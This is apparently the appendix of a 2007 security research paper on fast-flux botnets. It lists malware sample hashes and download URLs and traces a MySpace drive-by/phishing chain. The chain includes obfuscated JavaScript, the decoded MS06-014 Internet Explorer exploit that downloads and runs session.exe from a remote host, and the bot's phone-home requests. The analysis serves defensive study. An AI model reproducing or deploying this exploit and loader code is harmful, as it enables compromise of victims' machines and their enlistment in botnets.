Appendices:
There have been noticeable advancements the flux agent presented in this document over the past year, including the migration away from arbitrary TCP connections to obtain clear text instructions, using an HTTP library to obtain downloaded instructions, settings and binary updates, and finally the most recent variants that receive control settings via encoded update files. The following examples demonstrates a short historical timeline of just one fast-flux service network malware variant responsible for all double-flux service networks referenced in this research. It is worth noting that we have observed evidence supporting five distinct fast-flux service nets in operation on the Internet but have not acquired malware samples for all variants to support in depth study.
Sample: 5cbef2780c8b59977ae598775bad8ecb-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 51200 Bytes
Access: 2007-04-02 22:34:03.000000000 -0400
Modify: 2007-04-02 22:30:36.000000000 -0400
Change: 2007-04-02 22:34:03.000000000 -0400
MD5: 5cbef2780c8b59977ae598775bad8ecb
SHA1: 0925a54ba0366a6406d3222e65b03df0ea8cbc11
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 22:32:27] 5cbef2780c8b59977ae598775bad8ecb - http://xxx.myexes.hk/exes/weby.exe
Sample: 70978572bc5c4fecb9d759611b27a762-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 50176 Bytes
Access: 2007-03-15 02:09:03.000000000 -0400
Modify: 2007-03-09 10:51:26.000000000 -0500
Change: 2007-03-15 02:09:03.000000000 -0400
MD5: 70978572bc5c4fecb9d759611b27a762
SHA1: f8a4d881257dc2f2b2c17ee43f60144e6615994d
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-03-15 02:06:43] 70978572bc5c4fecb9d759611b27a762 âhttp://xxx.myexes.hk/exes/webdlx/weby.exe
Sample: 5870fd7119a91323dbdf04ebd07d0ac7-plugin_ddos.dll
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 9728 Bytes
Access: 2007-04-02 15:39:05.000000000 -0400
Modify: 2007-03-09 23:48:17.000000000 -0500
Change: 2007-04-02 15:39:06.000000000 -0400
MD5: 5870fd7119a91323dbdf04ebd07d0ac7
SHA1: 4c4d1b3e2030e9a8f3b5c8f152ef9ac7590a96ca
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 15:36:55] 5870fd7119a91323dbdf04ebd07d0ac7 â http://65.111.176.xxx/weby/plugin_ddos.dll
Previous incarnation:
Sample: e903534fab14ee7e00c279d64f578cbb-webyx.exe
File type(s): MS-DOS executable (EXE)
Size: 29557 Bytes
Access: 2007-02-06 15:26:03.000000000 -0500
Modify: 2007-02-02 08:47:24.000000000 -0500
Change: 2007-02-06 15:26:03.000000000 -0500
MD5: e903534fab14ee7e00c279d64f578cbb
SHA1: cf8279c35ec7d8914f3a4ccaaa71e14e7a925b93
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-02-06 15:20:55] e903534fab14ee7e00c279d64f578cbb - http://xxx.myfiles.hk/exes/webyx.exe
Even older sample:
Sample: 88b58b62ae43f0fa42e852874aefbd01-weby.exe
File type(s): MS-DOS executable (EXE)
Size: 29425 Bytes
Access: 2007-01-20 16:29:06.000000000 -0500
Modify: 2007-01-20 05:39:22.000000000 -0500
Change: 2007-01-20 16:29:06.000000000 -0500
MD5: 88b58b62ae43f0fa42e852874aefbd01
SHA1: 6a22e1a06ced848da220301ab85be7a33867bfb5
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-01-20 16:26:12] 88b58b62ae43f0fa42e852874aefbd01 - http://xxx.myexes.hk/exes/weby.exe
A prehistoric sample of flux-agent code (according to Internet time). We first observed
nodes infected with this malware in the middle of 2006, but only acquired a malware sample
for analysis in November 2006:
Sample: d134894005c299c1c01e63d9012a12c6-CD373B130D74F24CA5F8F1ADECA0F6856BC6072A-dnssvc.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 11264 Bytes
Access: 2006-11-14 06:39:03.000000000 -0500
Modify: 2006-11-14 06:29:14.000000000 -0500
Change: 2006-11-14 06:39:03.000000000 -0500
MD5: d134894005c299c1c01e63d9012a12c6
SHA1: cd373b130d74f24ca5f8f1adeca0f6856bc6072a
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2006-11-14 06:29:44] d134894005c299c1c01e63d9012a12c6 - CD373B130D74F24CA5F8F1ADE
Now that you have a better understanding of fast-flux technique, the different types, and the malware involved, let's see how the malware distribution process works. This is a real world example of a MySpace drive-by/phish attack vectors propagating Fast Flux network growth. In this example we identify two infection vectors:
1. Compromised MySpace Member profiles redirecting to drive-by/phish
2. SWF Flash image malicious redirection to drive-by/phish
We start with profile redirection in MySpace member profiles using iframes. Notice in this example just how many times iframes are called, often simply redirecting to another iframe. Also note the heavy use of obfuscated JavaScript. The attack begins when a connection is made to the domain http://xxx.e4447aa2.com.
<meta http-equiv="refresh" content="1;url="http://xxx.myspace.cfm.fuseaction.splash.mytoken.
76701a26.da3e.44a3a17b.e447aa2.com/da3e/index.php"/>
</HEAD>
</HTML>
By following the above /da3e/index.php link, we end up going to a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:
The iframe rendered /.footer_01.gif , which is not an actual gif file, but instead an encoded/obfuscated JavaScript snippet. Below we can see the obfuscated JavaScript code it feeds us.
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41
%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65
%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E
%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28
%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B
%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28
%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>
The decoded result of the above JavaScript is seen below, which is nothing more then another iframe redirecting with a connection to another site.
<iframe src="http://xxx.fafb4c4c.com/header_03.gif"></iframe>
The Iframe rendered /header_03.gif (served in flux) results in another JavaScript encoded/obfuscated file for which the decoded result of the above /header_03.gif is:
<iframe src="http://xxx.fafb4c4c.com/routine.php" width=1 height=1></iframe>
Following the iframe rendered /routine.php file results in another JavaScript encoded/obfuscated file. The decoded result of /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006. Below is the decode of the actual attack. Be Careful, This is Live Exploit Code.
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
Dim Obj_Name
Dim Obj_Prog<
set obj_RDS = document.createElement("object")
obj_RDS.setAttribute "id", "obj_RDS"
obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
fn = "ntmusis32.exe"
Obj_Name = "Shell"
Obj_Prog = "Application"
set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set oFolder = obj_ShellApp.NameSpace(20)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
fn=WinDir & fn
Obj_Name = "Microsoft"
Obj_Prog = "XMLHTTP"
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "GET","http://xxx.fafb4c4c.com/session.exe",False
obj_msxml2.send
On Error Resume Next
Obj_Name = "ADODB"
Obj_Prog = "Stream"
set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
If Err.Number Then
Obj_Name = "Scripting"
Obj_Prog = "FileSystemObject"
Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set download_file=obj_FileSys.CreateTextFile(fn, TRUE)
download_file_size=LenB(XMLBody)
For i=1
To download_file_size
cByte=MidB(XMLBody,i,1)
ByteCode=AscB(cByte)
download_file.Write(Chr(ByteCode))
Next
download_file.Close
Obj_Name = "WScript"
Obj_Prog = "Shell"
Set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
On Error Resume Next
obj_WShell.Run fn,1,FALSE
Else
obj_adodb.Type=1
obj_adodb.Open
obj_adodb.Write(obj_msxml2.responseBody)
obj_adodb.SaveToFile fn,2
obj_ShellApp.ShellExecute fn
End If
End If
End If
</SCRIPT>
The successful compromise of a windows host via this exploit content results in the download of a malicious downloader stub executable session.exe that is then responsible for attempting to download additional malicious components necessary for integrate new compromised hosts into a fast flux service network. The malware sample session.exe above attempts to download and execute the following components:
http://xxx.myfiles.hk/exes/webdl3x/weby.exe
http://xxx.myfiles.hk/exes/webdl3x/oly.exe
http://xxx.camgenie.com/weby7.exe
Supporting Detail:
Following are a representative sampling of URLs to imageshack.us site hosted flash files that simply perform one simple action, an action-script based browser redirect to a flux-hosted combination phishing/drive by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). All files are exactly the same based on same md5 and sha1 hashes for all files:
MD5:6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740
Imageshack HTTP Server maintained modification time suggest swf file compile time of 2007-06-05 03:56:30-0700. Decompiling the flash component results in:
$ swfdump -atp ./xxx.imageshack.us/img527/3530/38023350se6.swf
[HEADER] File version: 8
[HEADER] File size: 98
[HEADER] Frame rate: 120.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 1.00
[HEADER] Movie height: 1.00
[045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018] 31 PROTECT
[00c] 28 DOACTION
( 24 bytes) action: GetUrl URL:"http://xxx.e447aa2.com" Label:""
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END
Below are a few examples of URLs that host the same flash files:
http://xxx.imageshack.us/img116/1299/97231039qx0.swf
http://xxx.imageshack.us/img116/1424/81562934sa1.swf
http://xxx.imageshack.us/img116/1699/63088115dg4.swf
http://xxx.imageshack.us/img116/1700/81458378cv3.swf
http://xxx.imageshack.us/img116/2453/70754097cm0.swf
http://xxx.imageshack.us/img116/2456/14892185hl4.swf
http://xxx.imageshack.us/img116/8345/26333607xo4.swf
http://xxx.imageshack.us/img120/3595/53060403mw7.swf
The following are examples of flux serviced MySpace phish/drive-by domains referenced from presumably compromised MySpace user accounts, which were observed during the same time period between 2007-06-26 17:35:44 and 23:18:00 (EDT -0400)
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.00b24yqc.ac8a562.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0c38outb.h5v17lt.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0en0r8xd.115534a.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0l3ttn77.oqrhldv.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0w4c4w74.jk33v96.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.3kuto9a4.de082ak.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.5c1wkjil.kirjmbr.com
In our fast-flux case study, this is where our infected flux agent makes an initial contact (phone home) connection to a remote web server to report to the attacker that the victim system has been successfully infected and is standing by to provide flux-net services.
GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache
GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache
GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2007 07:55:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 19
Connection: close
Content-Type: text/html; charset=UTF-8
Added Successfully!
In our fast-flux case study, this is the server response to a request from the fast-flux agent for the configuration file settings.ini on the remote web server. This appears to be a consistent 197 byte binary/encoded configuration response. We are still attempting to complete reverse engineering of this session:
In our fast-flux case study, the system downloads a suspiciously named DLL plugin_ddos.dll, whose naming might suggest to some that it is a denial of service component.